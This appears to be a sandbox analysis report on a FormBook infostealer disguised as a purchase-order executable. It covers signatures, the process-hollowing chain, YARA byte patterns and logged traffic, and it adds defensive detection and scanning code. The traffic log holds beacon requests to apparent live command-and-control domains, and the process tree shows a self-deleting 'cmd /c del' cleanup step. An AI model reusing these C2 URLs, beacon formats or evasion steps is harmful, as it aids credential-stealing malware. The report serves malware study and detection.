

Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name: Purchase Order 40,7045$.exe
Analysis ID: 321389
MD5: ba4f1b472cb69d8a3924d88dacf1b833
SHA1: 622cdccdc0f020d368a87c5eff9ec1a1259e21c7
SHA256: 2a694c3a8347816b2f85e036b1064e410ad1578185a0608416944199ef72b82c
Tags: exe, Formbook, Yahoo


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match


Startup

  • System is w10x64
  • Purchase Order 40,7045$.exe (PID: 6708 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: BA4F1B472CB69D8A3924D88DACF1B833)
    • MSBuild.exe (PID: 6748 cmdline: {path} MD5: D621FD77BD585874F9686D3A76462EF1)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 7048 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6200 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
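The Startup tree above is the whole infection chain in five process creations: the sample starts MSBuild.exe and hollows it (the "Creates a process in suspended mode" and "Sample uses process hollowing technique" signatures further down), the hollowed MSBuild.exe injects into explorer.exe, explorer.exe starts raserver.exe, and raserver.exe runs cmd.exe /c del against the MSBuild.exe path. The MSBuild.exe -> explorer.exe hop is an injection, not a process creation, so endpoint telemetry will show raserver.exe with explorer.exe as its parent, which looks like a user launching a program. The detector below is an added example, not part of the Joe Sandbox report or of FormBook: it runs over constructed Sysmon-style process-creation records modelled on the tree (the cmd.exe image path is assumed) and flags three things that do not depend on the sample's hash: MSBuild.exe launched from a user-writable directory, a SysWOW64 system binary spawning a shell, and a del command aimed at the on-disk image of another process from the same window.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation records modelled on the report's Startup tree
# (Sysmon Event ID 1 style fields, not real telemetry). The sandbox draws
# explorer.exe under MSBuild.exe because of code injection; in real telemetry
# raserver.exe shows explorer.exe as its parent, as below.
EVENTS = [
    {"pid": 6708, "ppid": 3472, "image": r"C:\Users\user\Desktop\Purchase Order 40,7045$.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'"},
    {"pid": 6748, "ppid": 6708, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "parent_image": r"C:\Users\user\Desktop\Purchase Order 40,7045$.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"},
    {"pid": 7048, "ppid": 3472, "image": r"C:\Windows\SysWOW64\raserver.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\SysWOW64\raserver.exe"},
    # cmd.exe image path assumed (a 32-bit parent gets the SysWOW64 cmd.exe)
    {"pid": 6200, "ppid": 7048, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "parent_image": r"C:\Windows\SysWOW64\raserver.exe",
     "cmdline": r"cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'"},
    {"pid": 6268, "ppid": 6200, "image": r"C:\Windows\System32\conhost.exe",
     "parent_image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# "del [/switches] <path>" with the path optionally quoted; the sandbox renders
# the original double quotes as single quotes, so accept both.
DEL_RE = re.compile(r"""\bdel\b\s+(?:/\w+\s+)*['"]?([^'"]+?)['"]?\s*$""", re.IGNORECASE)


def base(path):
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def detect(events):
    """Return (rule, pid, detail) tuples for the three tree anomalies described above."""
    images = {e["image"].lower(): e["pid"] for e in events}  # every image seen in the window
    hits = []
    for e in events:
        img, parent = base(e["image"]), e["parent_image"].lower()
        # 1. A .NET build host started by an executable from a user-writable
        #    directory: the injection target here has no legitimate reason to
        #    be launched from the Desktop.
        if img == "msbuild.exe" and parent.startswith(USER_WRITABLE):
            hits.append(("msbuild_from_user_path", e["pid"], e["parent_image"]))
        # 2. A system binary living in SysWOW64 spawning a shell.
        if img == "cmd.exe" and parent.startswith("c:\\windows\\syswow64\\") and base(parent) != "cmd.exe":
            hits.append(("syswow64_binary_spawns_cmd", e["pid"], e["parent_image"]))
        # 3. A shell deleting the on-disk image of another process from the
        #    same window: the cleanup step aimed at the hollowed host.
        m = DEL_RE.search(e["cmdline"]) if img == "cmd.exe" else None
        if m:
            target = m.group(1).strip().lower()
            if target in images:
                hits.append(("deletes_image_of_running_process", e["pid"],
                             f"{target} (pid {images[target]})"))
    return hits


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"{rule:36} pid={pid} {detail}")
```

Rule 3 is the one worth keeping even when the loader changes: it ties the cleanup command to a process that actually ran, so it survives a switch from MSBuild.exe to another hollowing host. In production the `images` set should be limited to processes from the same host and a short time window rather than an entire log.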

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19167: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a1da: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16089: $sqlite3step: 68 34 1C 7B E1
  • 0x1619c: $sqlite3step: 68 34 1C 7B E1
  • 0x160b8: $sqlite3text: 68 38 2A 90 C5
  • 0x161dd: $sqlite3text: 68 38 2A 90 C5
  • 0x160cb: $sqlite3blob: 68 53 D8 7F 8C
  • 0x161f3: $sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19167: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a1da: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(18 further memory-dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.MSBuild.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.MSBuild.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x75d8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7972: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13285: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12d71: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13387: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x134ff: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x837a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x11fec: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x90f2: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18367: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x193da: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.MSBuild.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15289: $sqlite3step: 68 34 1C 7B E1
  • 0x1539c: $sqlite3step: 68 34 1C 7B E1
  • 0x152b8: $sqlite3text: 68 38 2A 90 C5
  • 0x153dd: $sqlite3text: 68 38 2A 90 C5
  • 0x152cb: $sqlite3blob: 68 53 D8 7F 8C
  • 0x153f3: $sqlite3blob: 68 53 D8 7F 8C
1.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.MSBuild.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19167: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a1da: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked-PE entry not shown)
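The rule strings above show how two of the three community rules recognise FormBook in memory. The JPCERT/CC rule's $sqlite3step, $sqlite3text and $sqlite3blob strings are each a five-byte `push imm32` (opcode 68 followed by a little-endian constant), i.e. call sites where the unpacked code pushes a hashed API name before resolving it; the yara-signator rule's $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) decodes to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the timing check behind the "Tries to detect virtualization through RDTSC time measurements" signature. Two practical points for anyone reusing these offsets: the same strings hit 0xE00 lower in 1.2.MSBuild.exe.400000.0.unpack than in the .raw.unpack and the .sdmp dumps, so an offset-based indicator must name which view it refers to, and the dumps that match are the 0x40 (execute/read/write) regions of process 1 (MSBuild.exe) and process 6 (raserver.exe). The scanner below is an added example, not the sandbox's or the rule authors' code: it plants the rule bytes into constructed filler instead of a real dump, and its reading of the dotted .sdmp name (process index, dump stage, id, base address, page protection, region type) is inferred from the names on this page rather than taken from vendor documentation.

```python
import struct

# Byte patterns copied from the rule strings listed above.
PATTERNS = {
    "sqlite3step": bytes.fromhex("68 34 1C 7B E1"),   # JPCERT/CC: push imm32
    "sqlite3text": bytes.fromhex("68 38 2A 90 C5"),   # JPCERT/CC: push imm32
    "sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),   # JPCERT/CC: push imm32
    # yara-signator $sequence_0: add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax
    "rdtsc_delta": bytes.fromhex("03 C8 0F 31 2B C1 89 45 FC"),
}


def find_all(blob: bytes, needle: bytes):
    """Yield every offset of needle in blob, overlapping matches included."""
    i = blob.find(needle)
    while i != -1:
        yield i
        i = blob.find(needle, i + 1)


def scan(blob: bytes) -> dict:
    """Offsets of every pattern present, in the shape YARA reports string matches."""
    return {name: list(find_all(blob, pat)) for name, pat in PATTERNS.items()
            if blob.find(pat) != -1}


def push_imm32(pat: bytes) -> int:
    """Decode the 32-bit immediate of a `push imm32` (opcode 0x68) pattern."""
    if len(pat) != 5 or pat[0] != 0x68:
        raise ValueError("not a push imm32 encoding")
    return struct.unpack("<I", pat[1:])[0]


def parse_dump_name(name: str) -> dict:
    """Split a Joe Sandbox .sdmp file name into its dotted fields.

    Field meaning (process index, dump stage, id, region base, page protection,
    region type) is an assumption inferred from the names on this page, not
    documented vendor format. 0x40 is PAGE_EXECUTE_READWRITE."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    proc, stage, _ident, region_base, protect, kind = stem.split(".")
    protect = int(protect, 16)
    return {"process": int(proc), "stage": int(stage), "base": int(region_base, 16),
            "protect": protect, "type": int(kind, 16), "rwx": protect == 0x40}


def build_blob() -> bytes:
    """Constructed stand-in for a memory dump: NOP filler with the rule bytes planted."""
    blob = bytearray(b"\x90" * 0x200)
    plant = {0x20: "rdtsc_delta", 0x80: "sqlite3step", 0xA0: "sqlite3text",
             0xB0: "sqlite3blob", 0x100: "sqlite3step"}
    for off, name in plant.items():
        blob[off:off + len(PATTERNS[name])] = PATTERNS[name]
    return bytes(blob)


if __name__ == "__main__":
    for name, offsets in scan(build_blob()).items():
        extra = f" imm32=0x{push_imm32(PATTERNS[name]):08X}" if PATTERNS[name][0] == 0x68 else ""
        print(f"{name:12} {[hex(o) for o in offsets]}{extra}")
    for dump in ("00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp",
                 "00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp"):
        d = parse_dump_name(dump)
        print(f"process {d['process']} base 0x{d['base']:X} protect 0x{d['protect']:02X} rwx={d['rwx']}")
```

Run against a real dump by replacing `build_blob()` with the file contents; the offsets it reports are file offsets in that dump, which is exactly why the .unpack and .raw.unpack numbers above differ by a constant.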

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.allmm.info/igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0 | Avira URL Cloud: Label: malware
Source: http://www.forbigdogs.com/igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0 | Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Purchase Order 40,7045$.exe | ReversingLabs: Detection: 18%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Purchase Order 40,7045$.exe | Joe Sandbox ML: detected
Source: 1.2.MSBuild.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then pop edi | 1_2_00415044
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then pop edi | 1_2_00415C88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then pop ebx | 1_2_004066DA
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop edi | 6_2_00675044
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop edi | 6_2_00675C88
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop ebx | 6_2_006666DA

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49747
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49756
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49758
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49759
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.ariasu-nakanokaikei.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.allan-wren.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.theoutdoorbed.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.sweetbasilmarketing.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.pasumaisangam.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.justsoldbykristen.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.lotoencasa.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.guidesgold.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.thoughtslate.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.chemtradent.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.erpsystem.site | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.forbigdogs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.rockinglifefromhome.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.allmm.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1 | Host: www.ariasu-nakanokaikei.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 81.169.145.95
Source: Joe Sandbox View | IP Address: 185.201.11.126
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
Source: Joe Sandbox View | ASN Name: IOFLOODUS
Source: unknown | TCP traffic detected without corresponding DNS query: 104.42.151.234
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 104.79.89.181
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 84.53.167.113
Source: unknown | TCP traffic detected without corresponding DNS query: 84.53.167.113
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 40.67.254.36
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 40.67.254.36
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 104.79.89.181
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown | DNS traffic detected: queries for: g.msn.com
